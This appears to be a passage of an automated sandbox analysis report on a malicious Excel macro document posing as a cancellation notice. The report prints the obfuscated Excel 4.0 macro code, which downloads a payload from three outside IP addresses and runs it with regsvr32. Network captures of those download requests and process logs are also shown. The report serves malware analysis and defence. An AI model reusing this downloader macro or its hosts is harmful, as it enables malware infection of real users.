    Preview: II*..................h\*.......t2#...1..Z)....).~9&.H.r.,.C+.I....e-.M.Si..}0.K.SJ...3.Ng.ZL..G.S..:m..N.Tk5..Z.Z...+.~.f.X.v.-..k.Y.....m.].Wk...p.[.WL...s.^o.\M....c..<n/!..ds9..[)...-..9..h.z...C..i....e..m.[m..}..k.[N.....nw.^N....s..>o/.r.....C4U.kw{......f..~.W....y........y...'...;.R..<.[..;....o...T.....+......?p....N.....#........ht'...Q..E....CQ.^.\m.E......o.Ba[.#Dp...>.<c .1$.*.Q.E....Ir..+.....Y.(H..*K..{..Q...I.....R.Y(Fr|m<$.l...RL.&.3..GP0..D....=.s.5CT,.FN.==7Sq...Iu.3JQ.%GUKS..X...5V.Hu.Z..9T..O4...KC.5.N.Q..aD...g.V.Mh.m.c.M.eMSe.?V..UoR...j....<]...G.v.B$v\Iv[.].f...N\...y_...M....p`w..b.6%.a......T3.c..S.WQ...S......tHk[7.[4;..k.#....~e...f.m.&...-.iz6....V5.jzN...:.3.k.......M..[......m[N...~.nz~.o...k....;.........y..{`.......u..|?-.q.f...|...m6...b..#..]'5..<...g.7_........q.u..].....$[.....~...+..I.p.zt.Y.N.}.............FS5.....k..H...#....~.w.....:...?........"..... 4..PB.A....l...j...... .p..BX1..D..0..Bx
    C:\Users\user\AppData\Local\Temp\DCCE0000
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):340119
    Entropy (8bit):7.979775569009726
    Encrypted:false
    SSDEEP:6144:lwObRMlgE+mJ9ABc/nv5k8IKAhBfsOwmLgzLc1pTcsGEdDIPmhsB0vRakfzeQZNX:lwObRMmEv2Bc/nvm8IKABfsYOmauFaJu
    MD5:69D79F7171AA2E0230CECF747BEBF3AF
    SHA1:864F5F341B7BC8D32D84F80BFD5FF190D6E5824D
    SHA-256:4CA5984F511772513D3AC69D038A13E50169548A30375C3D37B2ED3AFA789EC5
    SHA-512:B6390DA14D6B71AFC4C244551766037B065ACAB917409D401F85AEED57E7B0888FB1E354B431ED37BECE467D0920B9FCC001357CDEE8AB4C9C9D049622D71455
    Malicious:false
    Reputation:low
    Preview: ...n.0............n..C......@..X.,...&o_.I.-..{-|q.).~.....j...B..l\.X.V:..d..~.,.(...Y(.."..~.0yXy..E.X.....<........N.B#...9.B.....ht.....sL.l:..J<..n...v2.e...%T..FK.d.?Y...]Ui..........k.lL.&b..DJ,2.....~.MV.E..b.}.D.. ...Y..C]...&U....E'....N..).*._....b..8.M.lb.K..hKV4B.wk.....m_.:Bj##o?.....K..`..>...1BGn:........C...<,.|X.aq.........mX.x4...K..N..Oj........_.W.b.....k.S.Z.P.H.......}...9Y.....}#t.KS.]p>. ...._....{.....s.+zK.).?pg..4.)P{..../.......PK..........!.........W.......[Content_Types].xml ...(..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Cancellation_1844611233_06082021.LNK
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Jun 9 11:27:37 2021, atime=Wed Jun 9 11:27:37 2021, length=340119, window=hide
    Category:dropped
    Size (bytes):2258
    Entropy (8bit):4.550309181412507
    Encrypted:false
    SSDEEP:48:8u6/XT3Ik+9ZXasAQh2u6/XT3Ik+9ZXasAQ/:8b/XLIk+avQh2b/XLIk+avQ/
    MD5:64C7B0B8BA18D57C4AE57CE9EC96803A
    SHA1:2E0C8656898A851B5E0AD23374A8330B5FC82D3C
    SHA-256:E76FDC4878DF4C27B46CE82261ED705541884B2697ECEBBC00254706B7662D77
    SHA-512:5D16E6CF4118CF2C95729B2A812A218CA20CB315EB628916D092EBAC96E19BD6AEB752CBB5FC7410FF720B1DB34F73C66486723CE44FC6682FCBC7D3493192ED
    Malicious:false
    Reputation:low
    Preview: L..................F.... .......{..z@M.*]...dT.*]...0...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.D6...Roc .CANCEL~1.XLS..x.......Q.y.Q.y*...8.....................C.a.n.c.e.l.l.a.t.i.o.n._.1.8.4.4.6.1.1.2.3.3._.0.6.0.8.2.0.2.1...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\841675\Users.user\Desktop\Cancellation_1844611233_06082021.xlsm.<.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C.a.n.c.e.l.l.a.t.i.o.n._.1.8.4.4.6.1.1.2.3.3._.0.6.0.8.2.0.2.1...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Jun 9 11:27:37 2021, atime=Wed Jun 9 11:27:37 2021, length=8192, window=hide
    Category:dropped
    Size (bytes):867
    Entropy (8bit):4.4828377434773685
    Encrypted:false
    SSDEEP:12:85QAcLgXg/XAlCPCHaXgzB8IB/raxX+Wnicvb0nbDtZ3YilMMEpxRljKRlCTdJP8:85c/XTwz6IIxYeIbDv3qsArNru/
    MD5:9A3DF4A19F12AAEE8DAD249907A4A67A
    SHA1:2C1C405DCFDB502A2129FEFC4F1B0033E1E7B082
    SHA-256:827DB0BE74D2FF422AD5A4211B9688497E31B395FAFBCA63EA14B97AB321FA65
    SHA-512:48EFB137E33CB6B8DB97DE109E16D9F80AB94087EACBEC4E0011EFE3CA6D9FA303E2396129C68F72502BE3026E227BBDA4C90B0B955956BF870FDE9730A32790
    Malicious:false
    Reputation:low
    Preview: L..................F...........7G..z@M.*]..z@M.*]... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Rsc..Desktop.d......QK.X.Rsc*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\841675\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......841675..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):151
    Entropy (8bit):4.7385279356566095
    Encrypted:false
    SSDEEP:3:oyBVomxWtlUvER1EV2Al+iRvER1EV2AlmxWtlUvER1EV2Alv:djelaiu2ARBiu2Azlaiu2A1
    MD5:BDD24BA2D8E0AFD3162EC9939BEC776B
    SHA1:8BEDDA93C1AA179CA10365EDEA7C55B632C50DB6
    SHA-256:BA7A6036F9BE60A282137610CA6572CB23113C3DF2162D5681E4168ECE918FFB
    SHA-512:8487A64417283F201F18C68B951E0EF981AE60EA462140F5F74112C333855097B5E5DC2A1849D051ED563F2D04A52034C4FEB1C4CEB61FC5BB533CB164334D5D
    Malicious:false
    Reputation:low
    Preview: Desktop.LNK=0..[misc]..Cancellation_1844611233_06082021.LNK=0..Cancellation_1844611233_06082021.LNK=0..[misc]..Cancellation_1844611233_06082021.LNK=0..
    C:\Users\user\Desktop\ADCE0000
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):340119
    Entropy (8bit):7.979775569009726
    Encrypted:false
    SSDEEP:6144:lwObRMlgE+mJ9ABc/nv5k8IKAhBfsOwmLgzLc1pTcsGEdDIPmhsB0vRakfzeQZNX:lwObRMmEv2Bc/nvm8IKABfsYOmauFaJu
    MD5:69D79F7171AA2E0230CECF747BEBF3AF
    SHA1:864F5F341B7BC8D32D84F80BFD5FF190D6E5824D
    SHA-256:4CA5984F511772513D3AC69D038A13E50169548A30375C3D37B2ED3AFA789EC5
    SHA-512:B6390DA14D6B71AFC4C244551766037B065ACAB917409D401F85AEED57E7B0888FB1E354B431ED37BECE467D0920B9FCC001357CDEE8AB4C9C9D049622D71455
    Malicious:false
    Reputation:low
    Preview: ...n.0............n..C......@..X.,...&o_.I.-..{-|q.).~.....j...B..l\.X.V:..d..~.,.(...Y(.."..~.0yXy..E.X.....<........N.B#...9.B.....ht.....sL.l:..J<..n...v2.e...%T..FK.d.?Y...]Ui..........k.lL.&b..DJ,2.....~.MV.E..b.}.D.. ...Y..C]...&U....E'....N..).*._....b..8.M.lb.K..hKV4B.wk.....m_.:Bj##o?.....K..`..>...1BGn:........C...<,.|X.aq.........mX.x4...K..N..Oj........_.W.b.....k.S.Z.P.H.......}...9Y.....}#t.KS.]p>. ...._....{.....s.+zK.).?pg..4.)P{..../.......PK..........!.........W.......[Content_Types].xml ...(..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    C:\Users\user\Desktop\~$Cancellation_1844611233_06082021.xlsm
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):330
    Entropy (8bit):1.4377382811115937
    Encrypted:false
    SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
    MD5:96114D75E30EBD26B572C1FC83D1D02E
    SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
    SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
    SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
    Malicious:true
    Reputation:high, very likely benign file
    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

    Static File Info

    General

    File type:Microsoft Excel 2007+
    Entropy (8bit):7.97999804023918
    TrID:
    • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
    • ZIP compressed archive (8000/1) 16.67%
    File name:Cancellation_1844611233_06082021.xlsm
    File size:341572
    MD5:245c3e542030fb5f37cc1786c6d2ad52
    SHA1:d3659467af26b5cf1773b69bd6b9820b1b777dcb
    SHA256:72da5a8ba62bc25dfbe12f189664117f79db3fcf2d539e3b1f8abc3923e8a2ea
    SHA512:820d7b0e8686eeb0a020cf884ecbc86c8e0e64e1e2b4493174ce22c4461cb1440efb0e53a11635cd60c278639eab240604cbecc42612cc1900f534df566303db
    SSDEEP:6144:8gRMlgE+mJ9ABc/nv5k8IKAhBfsOwmLgzLc1pTcsGEdDIPmhsB0vRakfzeQZNpC:8gRMmEv2Bc/nvm8IKABfsYOmauFM
    File Content Preview:PK..........!...`.....W.......[Content_Types].xml ...(.........................................................................................................................................................................................................

    File Icon

    Icon Hash:e4e2aa8aa4bcbcac

    Static OLE Info

    General

    Document Type:OpenXML
    Number of OLE Files:1

    OLE File "Cancellation_1844611233_06082021.xlsm"

    Indicators

    Has Summary Info:
    Application Name:
    Encrypted Document:
    Contains Word Document Stream:
    Contains Workbook/Book Stream:
    Contains PowerPoint Document Stream:
    Contains Visio Document Stream:
    Contains ObjectPool Stream:
    Flash Objects Count:
    Contains VBA Macros:

    Macro 4.0 Code

    "=FORMULA('2dfgv'!F13&'2dfgv'!E14,I9)"=GOTO('1rtgvrt'!J3)
    "=FORMULA('3fescvaer'!I10&'3fescvaer'!D15,H8)"=GOTO('5fetaert'!H6)
    =,,,,,,,EX,,,,,,,E,,,,"=FORMULA(K10&K11,I10)",,,=D9&D10,,,,,,,=D12"C(""regsvr",,,,,,,,,,,,,,,,,,,,,"32 -s ""&"".""&"".""&""\""&""Post.storg"")","32 -s ""&"".""&"".""&""\""&""Post.storg1"")","32 -s ""&"".""&"".""&""\""&""Post.storg2"")",,,,,,,,,,,,,,,,=GOTO('4scdac'!G3),,,,,,,,,,..\Post.storg,..\Post.storg1,..\Post.storg2,,,,,
    "=FORMULA('3fescvaer'!D8&'5fetaert'!I12,I18)"=GOTO('9rrvrv'!J11)
    "=FORMULA('3fescvaer'!D8&'6vrtgarga'!I14,J18)"=HALT()
    ,,,,"=CONCATENATE(G12,nowik!I9)",,,,,,,,,,"=FORMULA(J5,J11)",,,,,,,,,,=NOW(),,,,.dat,,,,,,,=,=F12&F13,,,,REGIS,,,,"=Kokiser(0,K13&I14&J9&I10,'3fescvaer'!D19,0,0)",=K16&K17&K18"TER(""u""&""R""&""l""&""M""&""o""&""n"",""URL",,,"=""103.155.92.95/""",,Download,,,"=""45.144.31.105/""","=Kokiser(0,K13&I15&J9&I10,'3fescvaer'!E19,0,0)",ToFile,,,"=""51.89.115.125/""",,"=""ht""""A"",""JJC""""&CBB"",""Koki",,,,"=Kokiser(0,K13&I16&J9&I10,'3fescvaer'!F19,0,0)",tp"ser"",,1,9)",,,,,"=""://""",,,,,,,,,,,,,,=GOTO('3fescvaer'!H4),
    "=FORMULA('3fescvaer'!D8&'4scdac'!H8,H13)"=GOTO('8aevgadrg'!I6)
    =GOTO(nowik!H4)
    "=FORMULA('3fescvaer'!I10&'3fescvaer'!F15,I14)"=GOTO('7rvgasdg'!H7)
    "=FORMULA('3fescvaer'!I10&'3fescvaer'!E15,I12)"=GOTO('6vrtgarga'!H7)
    ,='1rtgvrt'!F14=F14&F15,='1rtgvrt'!F15&'1rtgvrt'!F16,='1rtgvrt'!F17&'1rtgvrt'!F18

    Network Behavior

    Snort IDS Alerts

    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
    06/09/21-05:28:03.955856TCP1201ATTACK-RESPONSES 403 Forbidden8049165103.155.92.95192.168.2.22
    06/09/21-05:28:46.338247TCP1201ATTACK-RESPONSES 403 Forbidden804916851.89.115.125192.168.2.22

    Network Port Distribution

    TCP Packets

    TimestampSource PortDest PortSource IPDest IP
    Jun 9, 2021 05:28:03.789802074 CEST4916580192.168.2.22103.155.92.95
    Jun 9, 2021 05:28:03.871062040 CEST8049165103.155.92.95192.168.2.22
    Jun 9, 2021 05:28:03.871273041 CEST4916580192.168.2.22103.155.92.95
    Jun 9, 2021 05:28:03.872816086 CEST4916580192.168.2.22103.155.92.95
    Jun 9, 2021 05:28:03.952491045 CEST8049165103.155.92.95192.168.2.22
    Jun 9, 2021 05:28:03.955856085 CEST8049165103.155.92.95192.168.2.22
    Jun 9, 2021 05:28:03.956016064 CEST4916580192.168.2.22103.155.92.95
    Jun 9, 2021 05:28:03.981368065 CEST4916680192.168.2.2245.144.31.105
    Jun 9, 2021 05:28:06.990617037 CEST4916680192.168.2.2245.144.31.105
    Jun 9, 2021 05:28:12.997312069 CEST4916680192.168.2.2245.144.31.105
    Jun 9, 2021 05:28:25.013051987 CEST4916780192.168.2.2245.144.31.105
    Jun 9, 2021 05:28:28.021444082 CEST4916780192.168.2.2245.144.31.105
    Jun 9, 2021 05:28:34.028018951 CEST4916780192.168.2.2245.144.31.105
    Jun 9, 2021 05:28:46.089322090 CEST4916880192.168.2.2251.89.115.125
    Jun 9, 2021 05:28:46.135672092 CEST804916851.89.115.125192.168.2.22
    Jun 9, 2021 05:28:46.135895967 CEST4916880192.168.2.2251.89.115.125
    Jun 9, 2021 05:28:46.137290001 CEST4916880192.168.2.2251.89.115.125
    Jun 9, 2021 05:28:46.185416937 CEST804916851.89.115.125192.168.2.22
    Jun 9, 2021 05:28:46.338247061 CEST804916851.89.115.125192.168.2.22
    Jun 9, 2021 05:28:46.338428974 CEST4916880192.168.2.2251.89.115.125
    Jun 9, 2021 05:29:08.957246065 CEST8049165103.155.92.95192.168.2.22
    Jun 9, 2021 05:29:08.957566023 CEST4916580192.168.2.22103.155.92.95
    Jun 9, 2021 05:29:51.340296030 CEST804916851.89.115.125192.168.2.22
    Jun 9, 2021 05:29:51.340539932 CEST4916880192.168.2.2251.89.115.125
    Jun 9, 2021 05:30:03.689954996 CEST4916880192.168.2.2251.89.115.125
    Jun 9, 2021 05:30:03.690498114 CEST4916580192.168.2.22103.155.92.95
    Jun 9, 2021 05:30:03.735905886 CEST804916851.89.115.125192.168.2.22
    Jun 9, 2021 05:30:03.769927025 CEST8049165103.155.92.95192.168.2.22

    HTTP Request Dependency Graph

    • 103.155.92.95
    • 51.89.115.125

    HTTP Packets

    Session IDSource IPSource PortDestination IPDestination PortProcess
    0192.168.2.2249165103.155.92.9580C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    TimestampkBytes transferredDirectionData
    Jun 9, 2021 05:28:03.872816086 CEST0OUTGET /44356.227524537.dat HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 103.155.92.95
    Connection: Keep-Alive
    Jun 9, 2021 05:28:03.955856085 CEST1INHTTP/1.1 403 Forbidden
    Server: nginx
    Date: Wed, 09 Jun 2021 03:28:03 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


    Session IDSource IPSource PortDestination IPDestination PortProcess
    1192.168.2.224916851.89.115.12580C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    TimestampkBytes transferredDirectionData
    Jun 9, 2021 05:28:46.137290001 CEST2OUTGET /44356.227524537.dat HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 51.89.115.125
    Connection: Keep-Alive
    Jun 9, 2021 05:28:46.338247061 CEST3INHTTP/1.1 403 Forbidden
    Server: nginx
    Date: Wed, 09 Jun 2021 03:25:00 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


    Code Manipulations

    Statistics

    CPU Usage

    Click to jump to process

    Memory Usage

    Click to jump to process

    High Level Behavior Distribution

    Click to dive into process behavior distribution

    Behavior

    Click to jump to process

    System Behavior

    General

    Start time:05:27:33
    Start date:09/06/2021
    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    Wow64 process (32bit):false
    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Imagebase:0x13f300000
    File size:27641504 bytes
    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:05:28:20
    Start date:09/06/2021
    Path:C:\Windows\System32\regsvr32.exe
    Wow64 process (32bit):false
    Commandline:regsvr32 -s ..\Post.storg
    Imagebase:0xff4b0000
    File size:19456 bytes
    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:05:28:21
    Start date:09/06/2021
    Path:C:\Windows\System32\regsvr32.exe
    Wow64 process (32bit):false
    Commandline:regsvr32 -s ..\Post.storg1
    Imagebase:0xff4b0000
    File size:19456 bytes
    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:05:28:21
    Start date:09/06/2021
    Path:C:\Windows\System32\regsvr32.exe
    Wow64 process (32bit):false
    Commandline:regsvr32 -s ..\Post.storg2
    Imagebase:0xff4b0000
    File size:19456 bytes
    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Disassembly

    Code Analysis

    Reset < >